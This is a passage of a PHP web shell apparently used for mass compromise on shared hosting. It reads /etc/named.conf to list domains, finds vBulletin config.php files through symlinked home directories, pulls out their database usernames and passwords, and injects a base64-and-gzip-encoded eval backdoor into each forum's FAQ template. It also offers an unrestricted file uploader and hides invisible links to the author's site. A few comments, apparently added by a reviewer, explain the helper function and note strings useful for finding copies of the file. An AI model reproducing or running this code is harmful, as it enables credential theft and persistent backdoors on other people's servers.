  1156. if(isset($_POST['s'])){
  1157.  
  1158.  
  1159.  
  1160. $file = @file_get_contents('vb.txt');
  1161.  
  1162. $ex = explode("\n",$file);
  1163.  
  1164. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1165.  
  1166.  
  1167. foreach ($ex as $exp){
  1168.  
  1169. $es = explode("||",$exp);
  1170.  
  1171. $config = $es[0];
  1172.  
  1173. $domin = $es[1];
  1174.  
  1175. $domins = trim($domin).'';
  1176.  
  1177. $readconfig = @file_get_contents(trim($config));
  1178.  
  1179. if(ereg('vBulletin',$readconfig)){
  1180.  
  1181.  
  1182.  
  1183. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1184.  
  1185. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1186.  
  1187. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1188.  
  1189. $con = @mysql_connect('localhost',$userdb,$pass);
  1190.  
  1191. $db = @mysql_select_db($db,$con);
  1192.  
  1193. $shell = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
  1194.  
  1195. $crypt = "{\${eval(gzinflate(base64_decode(\'";
  1196.  
  1197. $crypt .= "$shell";
  1198.  
  1199. $crypt .= "\')))}}{\${exit()}}</textarea>";
  1200.  
  1201. $sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
  1202.  
  1203. $query = @mysql_query($sqlfaq,$con);
  1204.  
  1205.  
  1206.  
  1207. if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
  1208.  
  1209. else
  1210.  
  1211. {
  1212.  
  1213. $r = '<b style="color:red">failed</b>';
  1214.  
  1215. }
  1216.  
  1217. $domins = trim($domin).'';
  1218.  
  1219. echo "<tr>
  1220. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1221. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1222.  
  1223.  
  1224.  
  1225.  
  1226.  
  1227.  
  1228.  
  1229. }else{
  1230.  
  1231. echo "<tr>
  1232. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1233. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1234. }
  1235.  
  1236. }
  1237.  
  1238.  
  1239.  
  1240.  
  1241.  
  1242.  
  1243.  
  1244.  
  1245.  
  1246.  
  1247. die();
  1248.  
  1249. }
  1250.  
  1251. if(!is_file('named.txt')){
  1252.  
  1253. $d00m = file("/etc/named.conf");
  1254.  
  1255. }else{
  1256.  
  1257. $d00m = file("named.txt");
  1258.  
  1259.  
  1260. }
  1261. if(!$d00m)
  1262. {
  1263.  
  1264. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1265. }
  1266. else
  1267.  
  1268. {
  1269. echo "<div class='tmp'>
  1270. <form method='POST' action='$pg?sws=vb'>
  1271. <input type='submit' value='Inject shell' />
  1272. <input type='hidden' value='1' name='s' />
  1273. </form>
  1274. <br /><br />
  1275. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1276.  
  1277. $f = fopen('vb.txt','w');
  1278.  
  1279. foreach($d00m as $dom){
  1280.  
  1281. if(eregi("zone",$dom)){
  1282.  
  1283. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1284.  
  1285. if(strlen(trim($domsws[1][0])) > 2){
  1286.  
  1287. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1288.  
  1289. ///////////////////////////////////////////////////////////////////////////////////
  1290.  
  1291. $wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
  1292. $wpp=get_headers($wpl);
  1293. $wp=$wpp[0];
  1294.  
  1295. $wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
  1296. $wpp2=get_headers($wp2);
  1297. $wp12=$wpp2[0];
  1298.  
  1299. $wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
  1300. $wpp3=get_headers($wp3);
  1301. $wp13=$wpp3[0];
  1302.  
  1303.  
  1304. ////////// vb ////////////
  1305.  
  1306. $pos = strpos($wp, "200");
  1307. $config="&nbsp;";
  1308.  
  1309. if (strpos($wp, "200") == true )
  1310. {
  1311. $config= $wpl;
  1312. }
  1313. elseif (strpos($wp12, "200") == true)
  1314. {
  1315. $config= $wp2;
  1316. }
  1317. elseif (strpos($wp13, "200") == true)
  1318. {
  1319. $config= $wp3;
  1320. }
  1321. else
  1322. {
  1323. continue;
  1324.  
  1325. }
  1326. flush();
  1327.  
  1328. /////////////////////////////////////////////////////////////////////////////////////
  1329.  
  1330. $dom = $domsws[1][0];
  1331.  
  1332. $w = fwrite($f,"$config||$dom \n");
  1333. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1334.  
  1335.  
  1336. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1337. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1338.  
  1339.  
  1340.  
  1341.  
  1342.  
  1343. flush();
  1344.  
  1345.  
  1346. }
  1347. }
  1348. }
  1349. }
  1350.  
  1351.  
  1352.  
  1353.  
  1354.  
  1355.  
  1356.  
  1357.  
  1358. break;
  1359.  
  1360. case 'help':
  1361.  
  1362. echo "<div class='tmp'>
  1363. <table align='center' width='40%'><td>function</td><td>Case</td>";
  1364.  
  1365.  
  1366. $safe_mode = ini_get('safe_mode');
  1367. if($safe_mode){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1368.  
  1369. echo "<tr><td>Safe Mode</td><td>$r</td>";
  1370.  
  1371. $fun = function_exists('symlink');
  1372. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1373.  
  1374. echo "<tr><td>function symlink</td><td>$r</td>";
  1375.  
  1376.  
  1377. $fun = function_exists('file');
  1378. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1379.  
  1380. echo "<tr><td>function file</td><td>$r</td>";
  1381.  
  1382. $fun = function_exists('file_get_contents');
  1383. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1384.  
  1385. echo "<tr><td>function file_get_contents</td><td>$r</td>";
  1386.  
  1387. $fun = function_exists('mkdir');
  1388. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1389.  
  1390. echo "<tr><td>function mkdir</td><td>$r</td>";
  1391.  
  1392.  
  1393. $fun = is_dir('sym/root');
  1394. if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}
  1395.  
  1396. echo "<tr><td>Permission denied</td><td>$r</td>";
  1397.  
  1398.  
  1399. $fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
  1400. if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}
  1401.  
  1402. echo "<tr><td>Forbidden</td><td>$r</td>";
  1403.  
  1404.  
  1405.  
  1406.  
  1407. echo "</table></div>";
  1408.  
  1409.  
  1410.  
  1411. break;
  1412. default:
  1413. header("Location: $pg");
  1414.  
  1415.  
  1416.  
  1417.  
  1418. }
  1419.  
  1420.  
  1421. /// home ///
  1422. }else
  1423. {
  1424.  
  1425.  
  1426. echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1427. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1428. if( $_POST['_upl'] == "Upload" ) {
  1429. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
  1430. else { echo '<br /><br />Not uploaded !!<br><br>'; }
  1431.  
  1432.  
  1433. }
  1434.  
  1435. echo '
  1436. <br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
  1437. <br /><br />
  1438. <b style="color: red";> Sec-w.Com </b>
  1439. <br /><br />
  1440. Muslims Hackers</div> ';
  1441.  
  1442. }
  1443.  
  1444.  
  /**
   * Return the substring of $text that sits between two delimiters.
   *
   * The text is split on $a and the piece following the first occurrence is
   * kept; that piece is then split on $b and everything before the first
   * occurrence of $b is returned. If $b does not occur, the whole remainder
   * after $a is returned.
   *
   * There is no guard for a missing start delimiter: when $a does not occur
   * in $text, index 1 of the first split does not exist.
   *
   * @param string $text Text to search.
   * @param string $a    Start delimiter.
   * @param string $b    End delimiter.
   * @return string Text found between the first $a and the next $b.
   */
  function ex($text,$a,$b){
      $pieces = explode($a, $text);
      $remainder = $pieces[1];
      // explode() always yields at least one element, so the first slot is the
      // part of the remainder that precedes the end delimiter.
      [$between] = explode($b, $remainder);
      return $between;
  }
  1450.  
  1451.  
  1452.  
  // Emits the closing markup of the page: the end of the wrapper <div>, two
  // anchors and the </body></html> tags.
  // Both anchors are styled with color #F4F4F4, the same value the page's
  // stylesheet assigns to the body background, so they render invisibly.
  // NOTE(review): the title/text bytes of the anchors look mis-decoded in this
  // copy (presumably a non-UTF-8 source encoding; unverified). They are runtime
  // output and are left exactly as found.
  // The sec-w.com/cc link target and this literal markup are stable strings that
  // can be matched when searching a web root for copies of this file.
  1453. echo '</div>
  1454.  
  1455. <a style="text-decoration: none; color: #F4F4F4;" title="ÇáÍãÇíå"/href="http://sec-w.com/cc">ÇáÍãÇíå</a>
  1456.  
  1457. <a style="text-decoration: none; color: #F4F4F4;" title="ÚÇáã ÇáÍãÇíå"/href="http://sec-w.com/cc">ÚÇáã ÇáÍãÇíå</a>
  1458.  
  1459.  
  1460.  
  1461. </body>
  1462.  
  1463. </html>
  1464. ';
  1465.  
  1466. ?>